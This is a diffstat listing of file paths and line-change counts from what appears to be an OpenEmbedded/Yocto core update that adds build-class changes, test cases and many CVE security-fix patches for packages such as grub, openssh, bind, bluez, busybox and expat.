Diffstat
-rw-r--r--README.OE-Core10
-rw-r--r--meta-selftest/lib/pseudo_pyc_test1.py1
-rw-r--r--meta-selftest/lib/pseudo_pyc_test2.py1
-rw-r--r--meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb1
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb2
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded2
-rw-r--r--meta-selftest/recipes-test/images/oe-selftest-image.bb2
-rw-r--r--meta-selftest/recipes-test/images/wic-image-minimal.bb5
-rw-r--r--meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb15
-rw-r--r--meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb2
-rw-r--r--meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb1
-rw-r--r--meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb1
-rw-r--r--meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb2
-rw-r--r--meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb3
-rw-r--r--meta-skeleton/recipes-skeleton/service/service_0.1.bb1
-rw-r--r--meta/classes/archiver.bbclass22
-rw-r--r--meta/classes/base.bbclass24
-rw-r--r--meta/classes/bin_package.bbclass3
-rw-r--r--meta/classes/buildhistory.bbclass36
-rw-r--r--meta/classes/cmake.bbclass3
-rw-r--r--meta/classes/cml1.bbclass8
-rw-r--r--meta/classes/create-spdx-2.2.bbclass1067
-rw-r--r--meta/classes/create-spdx.bbclass8
-rw-r--r--meta/classes/cve-check.bbclass479
-rw-r--r--meta/classes/devshell.bbclass1
-rw-r--r--meta/classes/devtool-source.bbclass4
-rw-r--r--meta/classes/devupstream.bbclass2
-rw-r--r--meta/classes/distutils-common-base.bbclass2
-rw-r--r--meta/classes/distutils3-base.bbclass2
-rw-r--r--meta/classes/distutils3.bbclass10
-rw-r--r--meta/classes/externalsrc.bbclass29
-rw-r--r--meta/classes/fs-uuid.bbclass2
-rw-r--r--meta/classes/go.bbclass13
-rw-r--r--meta/classes/goarch.bbclass2
-rw-r--r--meta/classes/grub-efi-cfg.bbclass1
-rw-r--r--meta/classes/image-live.bbclass4
-rw-r--r--meta/classes/image.bbclass17
-rw-r--r--meta/classes/image_types.bbclass4
-rw-r--r--meta/classes/image_types_wic.bbclass20
-rw-r--r--meta/classes/insane.bbclass42
-rw-r--r--meta/classes/kernel-arch.bbclass4
-rw-r--r--meta/classes/kernel-devicetree.bbclass18
-rw-r--r--meta/classes/kernel-fitimage.bbclass187
-rw-r--r--meta/classes/kernel-module-split.bbclass5
-rw-r--r--meta/classes/kernel-yocto.bbclass55
-rw-r--r--meta/classes/kernel.bbclass75
-rw-r--r--meta/classes/libc-package.bbclass3
-rw-r--r--meta/classes/license.bbclass15
-rw-r--r--meta/classes/license_image.bbclass28
-rw-r--r--meta/classes/linux-dummy.bbclass26
-rw-r--r--meta/classes/linuxloader.bbclass6
-rw-r--r--meta/classes/metadata_scm.bbclass8
-rw-r--r--meta/classes/mirrors.bbclass5
-rw-r--r--meta/classes/multilib.bbclass2
-rw-r--r--meta/classes/nativesdk.bbclass2
-rw-r--r--meta/classes/npm.bbclass8
-rw-r--r--meta/classes/package.bbclass108
-rw-r--r--meta/classes/package_deb.bbclass4
-rw-r--r--meta/classes/package_ipk.bbclass3
-rw-r--r--meta/classes/package_pkgdata.bbclass2
-rw-r--r--meta/classes/package_rpm.bbclass9
-rw-r--r--meta/classes/patch.bbclass7
-rw-r--r--meta/classes/populate_sdk_base.bbclass18
-rw-r--r--meta/classes/populate_sdk_ext.bbclass12
-rw-r--r--meta/classes/pypi.bbclass2
-rw-r--r--meta/classes/python3native.bbclass2
-rw-r--r--meta/classes/python3targetconfig.bbclass29
-rw-r--r--meta/classes/qemuboot.bbclass3
-rw-r--r--meta/classes/report-error.bbclass2
-rw-r--r--meta/classes/reproducible_build.bbclass90
-rw-r--r--meta/classes/rm_work.bbclass15
-rw-r--r--meta/classes/rootfs-postcommands.bbclass22
-rw-r--r--meta/classes/rootfs_deb.bbclass2
-rw-r--r--meta/classes/rootfs_ipk.bbclass2
-rw-r--r--meta/classes/rootfs_rpm.bbclass2
-rw-r--r--meta/classes/rootfsdebugfiles.bbclass2
-rw-r--r--meta/classes/sanity.bbclass61
-rw-r--r--meta/classes/scons.bbclass3
-rw-r--r--meta/classes/sstate.bbclass98
-rw-r--r--meta/classes/staging.bbclass14
-rw-r--r--meta/classes/systemd.bbclass3
-rw-r--r--meta/classes/testimage.bbclass40
-rw-r--r--meta/classes/toolchain-scripts.bbclass4
-rw-r--r--meta/classes/uboot-extlinux-config.bbclass1
-rw-r--r--meta/classes/uninative.bbclass8
-rw-r--r--meta/classes/useradd-staticids.bbclass2
-rw-r--r--meta/classes/useradd.bbclass4
-rw-r--r--meta/classes/utils.bbclass2
-rw-r--r--meta/classes/waf.bbclass18
-rw-r--r--meta/conf/abi_version.conf4
-rw-r--r--meta/conf/bitbake.conf29
-rw-r--r--meta/conf/distro/include/cve-extra-exclusions.inc75
-rw-r--r--meta/conf/distro/include/default-distrovars.inc4
-rw-r--r--meta/conf/distro/include/maintainers.inc51
-rw-r--r--meta/conf/distro/include/ptest-packagelists.inc2
-rw-r--r--meta/conf/distro/include/yocto-uninative.inc11
-rw-r--r--meta/conf/layer.conf4
-rw-r--r--meta/conf/licenses.conf15
-rw-r--r--meta/conf/local.conf.sample4
-rw-r--r--meta/conf/local.conf.sample.extended23
-rw-r--r--meta/conf/machine/include/qemu.inc2
-rw-r--r--meta/conf/multilib.conf2
-rw-r--r--meta/files/common-licenses/Spencer-9412
-rw-r--r--meta/files/common-licenses/Unlicense24
-rw-r--r--meta/files/fs-perms-persistent-log.txt2
-rw-r--r--meta/files/fs-perms.txt2
-rw-r--r--meta/files/spdx-licenses.json5937
-rw-r--r--meta/files/toolchain-shar-extract.sh15
-rw-r--r--meta/files/toolchain-shar-relocate.sh13
-rw-r--r--meta/lib/bblayers/create.py2
-rw-r--r--meta/lib/buildstats.py4
-rw-r--r--meta/lib/oe/copy_buildsystem.py6
-rw-r--r--meta/lib/oe/cve_check.py212
-rw-r--r--meta/lib/oe/gpg_sign.py2
-rw-r--r--meta/lib/oe/license.py6
-rw-r--r--meta/lib/oe/package_manager.py15
-rw-r--r--meta/lib/oe/packagedata.py11
-rw-r--r--meta/lib/oe/patch.py8
-rw-r--r--meta/lib/oe/path.py21
-rw-r--r--meta/lib/oe/prservice.py4
-rw-r--r--meta/lib/oe/qa.py1
-rw-r--r--meta/lib/oe/recipeutils.py2
-rw-r--r--meta/lib/oe/reproducible.py15
-rw-r--r--meta/lib/oe/rootfs.py8
-rw-r--r--meta/lib/oe/sbom.py84
-rw-r--r--meta/lib/oe/spdx.py357
-rw-r--r--meta/lib/oe/sstatesig.py15
-rw-r--r--meta/lib/oe/terminal.py20
-rw-r--r--meta/lib/oe/utils.py5
-rw-r--r--meta/lib/oeqa/core/case.py9
-rw-r--r--meta/lib/oeqa/core/decorator/oetimeout.py5
-rw-r--r--meta/lib/oeqa/core/target/ssh.py4
-rw-r--r--meta/lib/oeqa/core/tests/cases/timeout.py13
-rwxr-xr-xmeta/lib/oeqa/core/tests/test_decorators.py6
-rw-r--r--meta/lib/oeqa/manual/eclipse-plugin.json6
-rw-r--r--meta/lib/oeqa/manual/oe-core.json2
-rw-r--r--meta/lib/oeqa/manual/toaster-managed-mode.json2
-rw-r--r--meta/lib/oeqa/runtime/cases/date.py13
-rw-r--r--meta/lib/oeqa/runtime/cases/df.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py36
-rw-r--r--meta/lib/oeqa/runtime/cases/ksample.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/ltp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/pam.py3
-rw-r--r--meta/lib/oeqa/runtime/cases/parselogs.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/ping.py20
-rw-r--r--meta/lib/oeqa/runtime/cases/ptest.py1
-rw-r--r--meta/lib/oeqa/runtime/cases/rpm.py32
-rw-r--r--meta/lib/oeqa/runtime/cases/rtc.py40
-rw-r--r--meta/lib/oeqa/runtime/cases/runlevel.py22
-rw-r--r--meta/lib/oeqa/runtime/cases/scp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/suspend.py33
-rw-r--r--meta/lib/oeqa/runtime/cases/terminal.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/usb_hid.py22
-rw-r--r--meta/lib/oeqa/runtime/context.py33
-rw-r--r--meta/lib/oeqa/sdk/cases/buildepoxy.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/archiver.py16
-rw-r--r--meta/lib/oeqa/selftest/cases/bblayers.py5
-rw-r--r--meta/lib/oeqa/selftest/cases/bbtests.py13
-rw-r--r--meta/lib/oeqa/selftest/cases/buildoptions.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/cve_check.py220
-rw-r--r--meta/lib/oeqa/selftest/cases/devtool.py60
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/distrodata.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/glibc.py8
-rw-r--r--meta/lib/oeqa/selftest/cases/gotoolchain.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/imagefeatures.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/oelib/elf.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/oelib/utils.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/oescripts.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/pkgdata.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/prservice.py10
-rw-r--r--meta/lib/oeqa/selftest/cases/pseudo.py27
-rw-r--r--meta/lib/oeqa/selftest/cases/recipetool.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/reproducible.py128
-rw-r--r--meta/lib/oeqa/selftest/cases/runcmd.py4
-rw-r--r--meta/lib/oeqa/selftest/cases/runqemu.py9
-rw-r--r--meta/lib/oeqa/selftest/cases/runtime_test.py44
-rw-r--r--meta/lib/oeqa/selftest/cases/sstatetests.py14
-rw-r--r--meta/lib/oeqa/selftest/cases/tinfoil.py30
-rw-r--r--meta/lib/oeqa/selftest/cases/wic.py124
-rw-r--r--meta/lib/oeqa/selftest/context.py17
-rw-r--r--meta/lib/oeqa/utils/buildproject.py3
-rw-r--r--meta/lib/oeqa/utils/commands.py10
-rw-r--r--meta/lib/oeqa/utils/metadata.py6
-rw-r--r--meta/lib/oeqa/utils/nfs.py4
-rw-r--r--meta/lib/oeqa/utils/qemurunner.py41
-rw-r--r--meta/lib/oeqa/utils/targetbuild.py4
-rw-r--r--meta/recipes-bsp/efibootmgr/efibootmgr_17.bb2
-rw-r--r--meta/recipes-bsp/efivar/efivar/determinism.patch18
-rw-r--r--meta/recipes-bsp/efivar/efivar_37.bb3
-rw-r--r--meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb1
-rw-r--r--meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch235
-rw-r--r--meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch30
-rw-r--r--meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch65
-rw-r--r--meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch59
-rw-r--r--meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch55
-rw-r--r--meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch128
-rw-r--r--meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch121
-rw-r--r--meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch35
-rw-r--r--meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch82
-rw-r--r--meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch36
-rw-r--r--meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch94
-rw-r--r--meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch78
-rw-r--r--meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch104
-rw-r--r--meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch47
-rw-r--r--meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch77
-rw-r--r--meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch46
-rw-r--r--meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch2
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372.patch76
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch130
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch431
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch57
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch52
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch158
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25632.patch90
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25647.patch119
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27749.patch609
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779.patch70
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch105
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch35
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch62
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch61
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch65
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20225.patch58
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20233.patch50
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3695.patch178
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3696.patch46
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3697.patch82
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3981.patch32
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-2601.patch87
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28733.patch60
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28734.patch67
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28735.patch271
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28736.patch275
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-3775.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4692.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4693.patch62
-rw-r--r--meta/recipes-bsp/grub/files/determinism.patch56
-rw-r--r--meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch117
-rw-r--r--meta/recipes-bsp/grub/files/no-insmod-on-sb.patch107
-rw-r--r--meta/recipes-bsp/grub/grub2.inc88
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch36
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb1
-rw-r--r--meta/recipes-bsp/opensbi/opensbi_0.6.bb3
-rw-r--r--meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb5
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-10648-1.patch98
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-10648-2.patch52
-rw-r--r--meta/recipes-bsp/u-boot/files/CVE-2020-8432.patch114
-rw-r--r--meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb2
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-common.inc7
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-tools.inc15
-rw-r--r--meta/recipes-bsp/v86d/v86d_0.1.10.bb1
-rw-r--r--meta/recipes-connectivity/avahi/avahi.inc10
-rw-r--r--meta/recipes-connectivity/avahi/avahi_0.7.bb3
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch42
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch60
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch48
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch65
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch57
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch53
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch73
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch52
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch45
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch109
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch67
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch31
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch33
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch166
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch175
-rw-r--r--meta/recipes-connectivity/bind/bind_9.11.37.bb (renamed from meta/recipes-connectivity/bind/bind_9.11.22.bb)10
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5.inc8
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch109
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch34
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch95
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch66
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch39
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch126
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch54
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5_5.55.bb10
-rw-r--r--meta/recipes-connectivity/connman/connman-gnome_0.7.bb2
-rw-r--r--meta/recipes-connectivity/connman/connman.inc2
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch62
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch231
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch33
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch72
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch121
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch50
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch37
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch266
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch54
-rw-r--r--meta/recipes-connectivity/connman/connman_1.37.bb9
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch66
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch120
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch40
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb3
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch283
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch254
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch67
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch54
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb4
-rw-r--r--meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb3
-rw-r--r--meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb8
-rw-r--r--meta/recipes-connectivity/neard/neard_0.16.bb13
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch97
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch20
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch52
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch189
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch581
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch171
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch34
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch194
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch73
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch125
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch315
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch38
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch39
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch307
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch120
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch468
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch95
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd.socket1
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd@.service2
-rw-r--r--meta/recipes-connectivity/openssh/openssh_8.2p1.bb58
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch38
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch37
-rw-r--r--meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch122
-rw-r--r--meta/recipes-connectivity/openssl/openssl/reproducibility.patch22
-rw-r--r--meta/recipes-connectivity/openssl/openssl_1.1.1w.bb (renamed from meta/recipes-connectivity/openssl/openssl_1.1.1g.bb)9
-rw-r--r--meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb1
-rw-r--r--meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch50
-rw-r--r--meta/recipes-connectivity/ppp/ppp_2.4.7.bb5
-rw-r--r--meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb2
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch45
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch58
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch123
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch609
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb5
-rw-r--r--meta/recipes-core/base-files/base-files/hosts2
-rw-r--r--meta/recipes-core/base-passwd/base-passwd_3.5.29.bb1
-rw-r--r--meta/recipes-core/busybox/busybox.inc29
-rw-r--r--meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch51
-rw-r--r--meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch38
-rw-r--r--meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch81
-rw-r--r--meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch64
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42374.patch53
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42376.patch138
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2022-48174.patch82
-rw-r--r--meta/recipes-core/busybox/busybox_1.31.1.bb10
-rw-r--r--meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch215
-rw-r--r--meta/recipes-core/coreutils/coreutils_8.31.bb8
-rw-r--r--meta/recipes-core/dbus-wait/dbus-wait_git.bb3
-rw-r--r--meta/recipes-core/dbus/dbus-test_1.12.24.bb (renamed from meta/recipes-core/dbus/dbus-test_1.12.16.bb)42
-rw-r--r--meta/recipes-core/dbus/dbus.inc36
-rw-r--r--meta/recipes-core/dbus/dbus/CVE-2020-12049.patch78
-rw-r--r--meta/recipes-core/dbus/dbus/CVE-2023-34969.patch96
-rw-r--r--meta/recipes-core/dbus/dbus_1.12.24.bb (renamed from meta/recipes-core/dbus/dbus_1.12.16.bb)40
-rw-r--r--meta/recipes-core/dropbear/dropbear.inc11
-rw-r--r--meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch29
-rw-r--r--meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch145
-rw-r--r--meta/recipes-core/ell/ell_0.33.bb1
-rw-r--r--meta/recipes-core/expat/expat/CVE-2013-0340.patch1758
-rw-r--r--meta/recipes-core/expat/expat/CVE-2021-45960.patch65
-rw-r--r--meta/recipes-core/expat/expat/CVE-2021-46143.patch49
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-22822-27.patch257
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-23852.patch33
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-23990.patch49
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25235.patch283
